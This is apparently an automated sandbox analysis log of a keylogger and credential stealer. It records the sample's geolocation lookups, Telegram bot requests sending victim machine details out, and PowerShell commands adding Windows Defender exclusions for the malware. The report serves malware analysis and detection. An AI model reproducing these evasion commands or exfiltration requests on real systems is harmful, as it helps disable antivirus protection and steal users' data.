2024-12-10 13:07:52 UTC	873	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15395 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLdtBLStfFIsm5fGwF0t7yXYXvvVQgBgyJNB2tn4FlTo8HagDHsU4WLjaZhYJruQhlgoBvGy8uQhMoA99DzZRtP1BVIeEDf8GmmCCoJK58tVKO8bYoZWUo%2BG3x%2B8KFpl3OsyEdhF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75da3caade92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1548&rtt_var=643&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1886304&cwnd=241&unsent_bytes=0&cid=1cf45bc4a4099bda&ts=449&x=0"
2024-12-10 13:07:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49812	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:52 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:53 UTC	881	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15396 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TqaaKWbuntihZbGbnOmIvO7vhbnWfJCpgaEQ%2F6EfuVveBhyQWcVbcY6qg82qHwTaTIwY%2FGgGO6m%2BlZGW%2Bjy9dm3aNz5qCpH7ZefcPV5hj9a0wIvjFHrsNJXv5d%2BTlkO94xRlXRb%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75e058c543fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=1770&rtt_var=841&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1649717&cwnd=179&unsent_bytes=0&cid=20e62093dec89d17&ts=454&x=0"
2024-12-10 13:07:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49820	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:54 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:55 UTC	877	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15398 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Wn8zcjQfaZMtVQjsdfppzZGyDpn7FoADu%2FEN2%2BhKUN3H3hO%2FN72KC%2Bg7pGu43UUPc7iPJn5axZgBo054dXnyoEAofszxb9z31xts9LszF1LeSf0H8v84zu5xAHEqXZFfRQsngZU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75edcbfb43b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1749&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1626740&cwnd=238&unsent_bytes=0&cid=0a6ca382aae37007&ts=456&x=0"
2024-12-10 13:07:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49821	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:55 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:56 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15399 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmD0A3ZBEIVRo0SsoSzpI2UBUe5e3cqXBPSSZRkNrhQlJnqTxOFaFd8lkbbXQ6Lic5e03%2BO8OMPEy9LfOHYNxQq6WGTlQ63w727RoVokGFd8G4aq%2BD%2FQRCcAeSufXiHXzbY3Eh18"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75f3b8ab8cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1813&rtt_var=692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1569048&cwnd=189&unsent_bytes=0&cid=0e730247d84347de&ts=450&x=0"
2024-12-10 13:07:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49829	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:58 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:58 UTC	873	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15401 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxAZR8gIdKqC6QmEFCZfeOEyLvmOS%2B3wsqwXEVNGzOsMowtjsSV1BIJfQ6daVB3zsgqNSBg9IywYGJ3RmAboFVvCxwPikxaxmuETyYpFgpjT59uCQpxTudPksM70ZEQeaM7UOGnU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7601491a0f8f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1458&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1921052&cwnd=232&unsent_bytes=0&cid=574a7177d54db4b9&ts=450&x=0"
2024-12-10 13:07:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49835	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:58 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:59 UTC	879	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15402 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlkgsXOq6sYogZAQ1doOvTlAxAaNV6aOfMrzmOt1FYv7b0rsDGVer8xJLidqvaJFxtviOoUDnord%2FjWmas%2FG0lcZxxhp3y9EAkACA78T%2BnsuPW35d%2FbH95EgVAz%2Flp5zJzEJ9siU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd76076b9b8cbf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1806&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1585233&cwnd=249&unsent_bytes=0&cid=eda63a233c4e7252&ts=526&x=0"
2024-12-10 13:07:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49841	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:01 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:08:01 UTC	871	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:08:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15404 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnyfohHmhXXLxNdwUC0xo9CtUjdxJJ6XlkOCGDK9ugnF5wwt%2FcEBbOqTWIzJCjmpt25C9t86p8sGrvh5zQY04ZzPobuS1iyWQ2cGMexCamOVMkTVZDm6v7809BfC7n7eSbdo7vCe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd76164dcf8cc3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1843&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1540897&cwnd=224&unsent_bytes=0&cid=c5a64f1ada7a7470&ts=666&x=0"
2024-12-10 13:08:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49840	149.154.167.220	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:01 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:08:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-10 13:08:01 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 10 Dec 2024 13:08:01 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 13:08:01 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49850	104.21.67.152	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:04 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:08:04 UTC	885	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:08:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15407 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FVThXTBHWk%2BXn03w5IwqJE1j%2FaiDRDeUKBbipzUpm1SP2f5WENhubkXFyiQy0B1kmlmzAHgeFKdsXfj4dc4a4Qyq%2BCLr%2BfWmvzsarZxN2pNk0YhVDK3AIYVzZ%2F%2FFNIXEqo%2BOEE9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7629eba06a52-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=1974&rtt_var=767&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1479229&cwnd=210&unsent_bytes=0&cid=609ad6cd0832923b&ts=453&x=0"
2024-12-10 13:08:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49856	149.154.167.220	443	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:06 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:37:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-10 13:08:06 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 10 Dec 2024 13:08:06 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 13:08:06 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	08:07:23
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Imagebase:	0x2e0000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:07:26
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Imagebase:	0xb10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:07:27
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:07:27
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Imagebase:	0xb10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:07:27
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
